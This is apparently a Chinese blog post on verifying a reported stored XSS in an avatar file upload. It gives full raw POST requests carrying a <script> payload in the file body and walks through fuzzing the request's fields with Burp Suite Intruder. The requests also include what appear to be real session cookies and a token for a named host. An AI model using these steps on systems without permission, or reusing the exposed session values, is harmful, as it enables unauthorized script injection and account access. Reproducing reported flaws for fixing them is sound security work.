搜索到
1
篇与
的结果
-
burp suite XSS注入 问题 客户提供报告,平台用户头像上传存在 XSS 注入,注入如下 POST /xxxx/sz/commons/form/file/uploadfile?talkid=fileframe_32630131959&componentid=fileclass47014837621 HTTP/1.1 Host: xxx.xxx.xxx.xxx.org Cookie: JSESSIONID=9666C938FFE95C7882BDF062CDBCA985 Content-Length: 273009 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Accept-Language: zh-CN,zh;q=0.9 Origin: https://xxx.xxx.xxx.xxx.org Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDCENgQAk5nhgQUMC Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: https://xxx.xxx.xxx.xxx.org/succezbi/personal Accept-Encoding: gzip, deflate, br Priority: u=0, i Connection: keep-alive ------WebKitFormBoundaryDCENgQAk5nhgQUMC Content-Disposition: form-data; name="fileobj"; filename="test.jpg" Content-Type: image/jpeg <script>console.log("This is a XSS")</script> ------WebKitFormBoundaryDCENgQAk5nhgQUMC Content-Disposition: form-data; name="fileids" fileitem_26059703966 ------WebKitFormBoundaryDCENgQAk5nhgQUMC Content-Disposition: form-data; name="frameid" fileframe_32630131959 ------WebKitFormBoundaryDCENgQAk5nhgQUMC Content-Disposition: form-data; name="maxsize" -1 ------WebKitFormBoundaryDCENgQAk5nhgQUMC Content-Disposition: form-data; name="enabledempty" false ------WebKitFormBoundaryDCENgQAk5nhgQUMC-- 上传附件时,注入代码 <script>console.log("This is a XSS")</script> 此时访问以下地址则出现注入内容: GET /xxxx/sz/commons/form/file/image?file=fileitem_26059703966 burp suite验证 在 Intruder 界面 Target 填入测试环境地址,下方输入框内输入请求体 POST /sz/commons/form/file/uploadfile?talkid=fileframe_50732522777&componentid=fileclass71322103760 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br, zstd Cache-Control: no-cache Connection: keep-alive Content-Length: 4420 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyBoZYBNBtNBsHoPx Cookie: crowd.token_key=wO2uto7x9RjL0Bo3Au2r3A00; JSESSIONID=D3D1F1CBA51DEC5D0BCF8740354740A9 DNT: 1 Host: mis2.succez.com Origin: https://mis2.succez.com Pragma: no-cache Referer: https://mis2.succez.com/personal Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" ------WebKitFormBoundaryyBoZYBNBtNBsHoPx Content-Disposition: form-data; name="fileobj"; filename="yuc.png" Content-Type: image/png ------WebKitFormBoundaryyBoZYBNBtNBsHoPx Content-Disposition: form-data; name="fileids" fileitem_67046981973 ------WebKitFormBoundaryyBoZYBNBtNBsHoPx Content-Disposition: form-data; name="frameid" fileframe_89622953867 ------WebKitFormBoundaryyBoZYBNBtNBsHoPx Content-Disposition: form-data; name="maxsize" -1 ------WebKitFormBoundaryyBoZYBNBtNBsHoPx Content-Disposition: form-data; name="enabledempty" false ------WebKitFormBoundaryyBoZYBNBtNBsHoPx-- 然后在左侧或右侧 Payloads 页,Payload configuration 中 Add 注入代码 <script>console.log("This is a XSS")</script> 接下来回到请求体框内,点击想要注入代码的位置,然后找到 Positions 选择 Add 即可,效果如下 可以看到有些位置存在类似 $$ 符号,那么这些就是添加注入的位置,在执行 attack 后会分别在这几个位置添加注入代码请求 注入结果如下 可以看到有一个请求成功为 200,打开浏览器开发者模式确认
